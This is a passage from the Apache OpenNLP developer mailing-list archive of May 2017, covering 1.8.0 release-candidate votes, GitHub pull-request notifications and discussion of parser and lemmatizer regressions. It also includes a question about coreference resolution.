> >> On Thu, May 18, 2017 at 1:27 PM, Damiano Porta <damianopo...@gmail.com>
> >> wrote:
> >>
> >> > Hi, thanks but I need to link entities to each others . I do not need
> to
> >> > link entities to external resources.
> >> >
> >> > Damiano
> >> >
> >> > Il 18 mag 2017 13:12, "Bruno P. Kinoshita"
> >> > <brunodepau...@yahoo.com.br.invalid> ha scritto:
> >> >
> >> > > Few days ago went to look at an old issue to see if I could perhaps
> >> write
> >> > > some docs for it, but I think the coref module is not in the
> sandbox.
> >> > >
> >> > >
> >> > > Here's the issue in question https://issues.apache.org/
> >> > > jira/browse/OPENNLP-48 and here's where I believe the code is now
> >> located
> >> > > https://svn.apache.org/repos/asf/opennlp/sandbox/opennlp-coref/
> >> > >
> >> > > Not sure if there was any other work not mentioned in that issue.
> >> > >
> >> > > Hope that helps
> >> > > Bruno
> >> > > 
> >> > > From: Damiano Porta <damianopo...@gmail.com>
> >> > > To: dev@opennlp.apache.org
> >> > > Sent: Thursday, 18 May 2017 10:54 PM
> >> > > Subject: CoReference
> >> > >
> >> > >
> >> > >
> >> > > Hello everybody,
> >> > >
> >> > > i need a coreference solution to link my entities (DATE, PERSON,
> ORG).
> >> > Can
> >> > >
> >> > > someone show me the way to start working on that?
> >> > >
> >> > >
> >> > > Thank you so much.
> >> > >
> >> > > Damiano
> >> > >
> >> >
> >>
> >
>


Re: CoReference

2017-05-18 Thread Joern Kottmann
This is for linking entities in one document, e.g. first name mention to a
full name mention, or to he, she, it.

Jörn

On Thu, May 18, 2017 at 1:27 PM, Damiano Porta 
wrote:

> Hi, thanks but I need to link entities to each others . I do not need to
> link entities to external resources.
>
> Damiano
>
> Il 18 mag 2017 13:12, "Bruno P. Kinoshita"
>  ha scritto:
>
> > Few days ago went to look at an old issue to see if I could perhaps write
> > some docs for it, but I think the coref module is not in the sandbox.
> >
> >
> > Here's the issue in question https://issues.apache.org/
> > jira/browse/OPENNLP-48 and here's where I believe the code is now located
> > https://svn.apache.org/repos/asf/opennlp/sandbox/opennlp-coref/
> >
> > Not sure if there was any other work not mentioned in that issue.
> >
> > Hope that helps
> > Bruno
> > 
> > From: Damiano Porta 
> > To: dev@opennlp.apache.org
> > Sent: Thursday, 18 May 2017 10:54 PM
> > Subject: CoReference
> >
> >
> >
> > Hello everybody,
> >
> > i need a coreference solution to link my entities (DATE, PERSON, ORG).
> Can
> >
> > someone show me the way to start working on that?
> >
> >
> > Thank you so much.
> >
> > Damiano
> >
>


[VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-17 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 3. 

The RC 3 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
3/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
3
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite some changes, please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 1.8.0
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[GitHub] opennlp pull request #205: OPENNLP-1064: Disable evalDutchMaxentQn test

2017-05-17 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/205


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #206: [WIP] OPENNLP-1065: Use ISO-639-3 in test code

2017-05-17 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/206

[WIP] OPENNLP-1065: Use ISO-639-3 in test code

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1065

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/206.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #206


commit 8f394be0d068ef2385d08af1554f897c0c761350
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-17T09:24:23Z

OPENNLP-1065: Use ISO-639-3 in test code




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #205: OPENNLP-1064: Disable evalDutchMaxentQn test

2017-05-17 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/205

OPENNLP-1064: Disable evalDutchMaxentQn test

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1064

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/205.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #205


commit 1a70b54f7f0432035f917b52989ee0318b1544af
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-17T08:11:57Z

OPENNLP-1064: Disable evalDutchMaxentQn test




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #201: Opennlp 1060

2017-05-15 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/201

Opennlp 1060

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1060

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/201.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #201


commit 54432f8bc660d0ce64acc6569609644ae9bb4848
Author: beylerian <anthony.beyler...@gmail.com>
Date:   2017-05-13T17:37:01Z

OPENNLP-1058: Update README.md to cover more

closes #198

commit 8ae5107f77453f13959525edee8694a6fefac2e6
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-15T19:54:40Z

OPENNLP-1060: Fix computation of hash for the parser




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Good to hear, the parser eval test also had a bug (O-1060), we will fix
this now as well before the next RC,
this should prevent that this happens again.

And thanks again for finding this!

Now we need to find the problem with the lemmatizer before we can build the
next RC.

Jörn



On Mon, May 15, 2017 at 6:21 PM, Richard Eckart de Castilho <r...@apache.org>
wrote:

> > On 15.05.2017, at 16:35, Joern Kottmann <kottm...@gmail.com> wrote:
> >
> > Richard, I believe I found the problem with the parser, would you mind to
> > take a look?
> >
> > This PR should fix it:
> > https://github.com/apache/opennlp/pull/199
>
> The parser test works nicely with the PR.
>
> The lemmatizer test still behaves strange.
>
> Cheers,
>
> -- Richard
>
>


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Richard, I believe I found the problem with the parser, would you mind to
take a look?

This PR should fix it:
https://github.com/apache/opennlp/pull/199

Jörn

On Mon, May 15, 2017 at 4:14 PM, Richard Eckart de Castilho 
wrote:

> Hi Rodrigo,
>
> On 15.05.2017, at 15:36, Rodrigo Agerri  wrote:
> >
> > I cannot reproduce the lemmatizer issue. Could you please share your
> > training data?
>
> I have observed the change in behavior via the OpenNlpLemmatizerTrainerTest
> in DKPro Core [1]. It happens when I change the OpenNLP version in the POM
> from 1.7.2 to 1.8.0 (after including the OpenNLP staging Maven repo of
> course).
> Unfortunately, it's not a simple minimal OpenNLP-only unit test, but it
> makes used
> of the respective DKPro Core UIMA components.
>
> The data that is used is the GUM 3.0.0 corpus, specifically the CoNLL
> files in it [2].
>
> The corpus can be downloaded from: https://github.com/amir-
> zeldes/gum/archive/V3.0.0.zip
>
> Cheers,
>
> -- Richard
>
> [1] https://github.com/dkpro/dkpro-core/blob/
> 89f144a63b214cd584b3cd0e6c499dff6cbcd9ca/dkpro-core-opennlp-
> asl/src/test/java/de/tudarmstadt/ukp/dkpro/core/opennlp/
> OpenNlpLemmatizerTrainerTest.java
> [2] https://github.com/dkpro/dkpro-core/blob/master/dkpro-
> core-api-datasets-asl/src/main/resources/de/tudarmstadt/
> ukp/dkpro/core/api/datasets/lib/gum-en-conll-3.0.0.yaml


[GitHub] opennlp pull request #199: OPENNLP-1059 Set model version before creating th...

2017-05-15 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/199

OPENNLP-1059 Set model version before creating the POS Model

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1059

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/199.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #199


commit 108fa9a93c2cd126a138f8813390e197d0a3584e
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-15T14:04:58Z

OPENNLP-1059 Set model version before creating the POS Model




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-15 Thread Joern Kottmann
Hello Richard,

thanks for reporting this. For 1.8.0 we replaced a Heap with a SortedSet
[1]. In this commit there is one loop [2] which iterates through the parses
which will be advanced. The order of the Parsers in the Heap was not so
well defined, therefore we decided to sort them by probability.
We also noticed that this change is changing the output of the parser with
the existing models in our SourceForge model eval test [3].

After running the evaluation on the OntoNotes4 data set I only got  very
small change and decided it is ok to do this. I am not aware of how big the
change is but is was less than the delta in test case [4] of 0.001.

What do you think? Should this be rolled back?

Anyway, that said, about the parser, I still need to understand what
happened with the lemmatizer.

Jörn

[1]
https://github.com/apache/opennlp/commit/3df659b9bfb02084e782f1e8b6ec716f56e0611c
[2]
https://github.com/apache/opennlp/blob/3df659b9bfb02084e782f1e8b6ec716f56e0611c/opennlp-tools/src/main/java/opennlp/tools/parser/AbstractBottomUpParser.java#L285
[3]
https://github.com/apache/opennlp/commit/3df659b9bfb02084e782f1e8b6ec716f56e0611c#diff-a5834f32b8a41b76a336126e4b13d4f7L349
[4]
https://github.com/apache/opennlp/blob/3df659b9bfb02084e782f1e8b6ec716f56e0611c/opennlp-tools/src/test/java/opennlp/tools/eval/OntoNotes4ParserEval.java#L70

On Sat, May 13, 2017 at 10:35 PM, Richard Eckart de Castilho <r...@apache.org
> wrote:

> Hi all,
>
> > On 11.05.2017, at 18:37, Joern Kottmann <kottm...@gmail.com> wrote:
> >
> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > 1.8.0 Release Candidate 2.
>
> Should OpenNLP 1.8.0 yield identical results as 1.7.2 when the same
> models are used during classification?
>
> E.g. the English parser model seems to create different POS tags now
> for the sentence "We need a very complicated example sentence ,
> which contains as many constituents and dependencies as possible .".
> "a" is now wrongly tagged as "," whereas 1.7.2 tagged it correctly as "DT".
>
> Should OpenNLP 1.8.0 yield identical results as 1.7.2 when the same
> training data is used during training?
>
> I have a test that trains a lemmatizer model on GUM 3.0.0. With 1.7.2,
> this model reached an f-score of ~0.96. With 1.8.0, I only get ~0.84.
>
> Cheers,
>
> -- Richard
>
>
>


Re: Error when processing doap file http://opennlp.apache.org/doap_opennlp.rdf:

2017-05-12 Thread Joern Kottmann
Thanks for forwarding this to the dev list. The file is now available again.

Jörn

On Fri, May 12, 2017 at 10:46 AM, sebb  wrote:

> -- Forwarded message --
> From: Projects 
> Date: 12 May 2017 at 03:00
> Subject: Error when processing doap file
> http://opennlp.apache.org/doap_opennlp.rdf:
> To: Site Development 
>
>
> http://opennlp.apache.org/doap_opennlp.rdf
>


[VOTE] Apache OpenNLP 1.8.0 Release Candidate 2

2017-05-11 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 2. 

The RC 2 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
2/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
2
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite some changes, please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 1.8.0
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[ANNOUNCE] New website for Apache OpenNLP

2017-05-11 Thread Joern Kottmann
Hello all,

we launched a redesigned new web site for Apache OpenNLP with a new logo -
check it out at https://opennlp.apache.org

Regards,
The Apache OpenNLP Team


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-11 Thread Joern Kottmann
I am canceling the vote due to the above mentioned bug.
Lets prepare another RC which has this issue fixed.

Jörn

On Thu, May 11, 2017 at 9:51 AM, Joern Kottmann <kottm...@gmail.com> wrote:

> I am changing my vote to -1 due to a bug i the DictionaryLemmatizer, in
> case the word and postag pair is not in the dictionary, it throws a
> NullPointerException. See line 117 of DictionaryLemmatizer.
>
> Thanks to Daniel for finding this bug.
>
> Jörn
>
> On Wed, May 10, 2017 at 3:31 PM, Jeff Zemerick <jzemer...@apache.org>
> wrote:
>
>> +1 non-binding
>>
>> Built and tested on Ubuntu 16.04 and Amazon Linux 2017.03.0 with OpenJDK8.
>> NOTICE and LICENSE files look good.
>> Created and tested a token name finder model.
>>
>> Jeff
>>
>>
>> On Tue, May 9, 2017 at 2:41 PM, Joern Kottmann <kottm...@gmail.com>
>> wrote:
>>
>> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
>> > 1.8.0 Release Candidate 1.
>> >
>> > The RC 1 distributables can be downloaded from here:
>> > https://repository.apache.org/content/repositories/orgapacheopennlp-101
>> > 1/org/apache/opennlp/opennlp-distr/1.8.0/
>> >
>> > The release was made from the Apache OpenNLP 1.8.0 tag at
>> > https://github.com/apache/opennlp/tree/opennlp-1.8.0
>> >
>> > To use it in a maven build set the version for opennlp-tools or
>> > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
>> > file:
>> > https://repository.apache.org/content/repositories/orgapacheopennlp-101
>> > 1
>> >
>> > The release was made using the OpenNLP release process, documented on
>> > the Wiki here:
>> > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>> >
>> > The release contains quite some changes, please refer to the contained
>> > issue list for details.
>> >
>> > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
>> > vote is open for at least the next 72 hours.
>> >
>> > Only votes from OpenNLP PMC are binding, but folks are welcome to check
>> > the release candidate and voice their approval or disapproval. The vote
>> > passes if at least three binding +1 votes are cast.
>> >
>> > [ ] +1 Release the packages as Apache OpenNLP 
>> > [ ] -1 Do not release the packages because...
>> >
>> >
>> > Thanks!
>> >
>> > Jörn
>> >
>> > P.S. Here is my +1.
>> >
>>
>
>


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-11 Thread Joern Kottmann
I am changing my vote to -1 due to a bug i the DictionaryLemmatizer, in
case the word and postag pair is not in the dictionary, it throws a
NullPointerException. See line 117 of DictionaryLemmatizer.

Thanks to Daniel for finding this bug.

Jörn

On Wed, May 10, 2017 at 3:31 PM, Jeff Zemerick <jzemer...@apache.org> wrote:

> +1 non-binding
>
> Built and tested on Ubuntu 16.04 and Amazon Linux 2017.03.0 with OpenJDK8.
> NOTICE and LICENSE files look good.
> Created and tested a token name finder model.
>
> Jeff
>
>
> On Tue, May 9, 2017 at 2:41 PM, Joern Kottmann <kottm...@gmail.com> wrote:
>
> > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > 1.8.0 Release Candidate 1.
> >
> > The RC 1 distributables can be downloaded from here:
> > https://repository.apache.org/content/repositories/orgapacheopennlp-101
> > 1/org/apache/opennlp/opennlp-distr/1.8.0/
> >
> > The release was made from the Apache OpenNLP 1.8.0 tag at
> > https://github.com/apache/opennlp/tree/opennlp-1.8.0
> >
> > To use it in a maven build set the version for opennlp-tools or
> > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> > file:
> > https://repository.apache.org/content/repositories/orgapacheopennlp-101
> > 1
> >
> > The release was made using the OpenNLP release process, documented on
> > the Wiki here:
> > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
> >
> > The release contains quite some changes, please refer to the contained
> > issue list for details.
> >
> > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> > vote is open for at least the next 72 hours.
> >
> > Only votes from OpenNLP PMC are binding, but folks are welcome to check
> > the release candidate and voice their approval or disapproval. The vote
> > passes if at least three binding +1 votes are cast.
> >
> > [ ] +1 Release the packages as Apache OpenNLP 
> > [ ] -1 Do not release the packages because...
> >
> >
> > Thanks!
> >
> > Jörn
> >
> > P.S. Here is my +1.
> >
>


[GitHub] opennlp pull request #196: [1.8.1] OPENNLP-1054: Remove deprecated Heap and ...

2017-05-10 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/196

[1.8.1] OPENNLP-1054: Remove deprecated Heap and HeapList

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1054

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/196.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #196


commit 77b9da37dbda82123a9f368a865ec44e0b4ded2c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-10T14:48:09Z

OPENNLP-1054: Remove deprecated Heap and HeapList




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[VOTE] Apache OpenNLP 1.8.0 Release Candidate

2017-05-09 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 1. 

The RC 1 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
1/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-101
1
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite some changes, please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[GitHub] opennlp pull request #185: OPENNLP-1046: Correctly join tokens to text strin...

2017-04-26 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/185


---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #185: OPENNLP-1046: Correctly join tokens to text strin...

2017-04-26 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/185

OPENNLP-1046: Correctly join tokens to text string

The text was one space too long which results in a different
parse tree if the method is used to reproduce an existing
parse tree as it is done by the parser evaluation tool.

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1046

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/185.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #185


commit f4f1368eeb0d59bc2566d7a353730aaa81c7a961
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-04-26T08:46:48Z

OPENNLP-1046: Correctly join tokens to text string

The text was one space too long which results in a different
parse tree if the method is used to reproduce an existing
parse tree as it is done by the parser evaluation tool.




---
If your project is set up for it, you can reply to this email and have your
reply appear on GitHub as well. If your project does not have this feature
enabled and wishes so, or if the feature is enabled but not working, please
contact infrastructure at infrastruct...@apache.org or file a JIRA ticket
with INFRA.
---


[GitHub] opennlp pull request #184: [WIP] OPENNLP-1021: Change xv folds from 10 to 5 ...

2017-04-24 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/184

[WIP] OPENNLP-1021: Change xv folds from 10 to 5 to reduce runtime

Thank you for contributing to Apache OpenNLP.

In order to streamline the review of the contribution we ask you
to ensure the following steps have been taken:

### For all changes:
- [ ] Is there a JIRA ticket associated with this PR? Is it referenced 
 in the commit message?

- [ ] Does your PR title start with OPENNLP- where  is the JIRA 
number you are trying to resolve? Pay particular attention to the hyphen "-" 
character.

- [ ] Has your PR been rebased against the latest commit within the target 
branch (typically master)?

- [ ] Is your initial contribution a single, squashed commit?

### For code changes:
- [ ] Have you ensured that the full suite of tests is executed via mvn 
clean install at the root opennlp folder?
- [ ] Have you written or updated unit tests to verify your changes?
- [ ] If adding new dependencies to the code, are these dependencies 
licensed in a way that is compatible for inclusion under [ASF 
2.0](http://www.apache.org/legal/resolved.html#category-a)? 
- [ ] If applicable, have you updated the LICENSE file, including the main 
LICENSE file in opennlp folder?
- [ ] If applicable, have you updated the NOTICE file, including the main 
NOTICE file found in opennlp folder?

### For documentation related changes:
- [ ] Have you ensured that format looks appropriate for the output in 
which it is rendered?

### Note:
Please ensure that once the PR is submitted, you check travis-ci for build 
issues and submit an update to your PR as soon as possible.


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1021

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/184.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #184


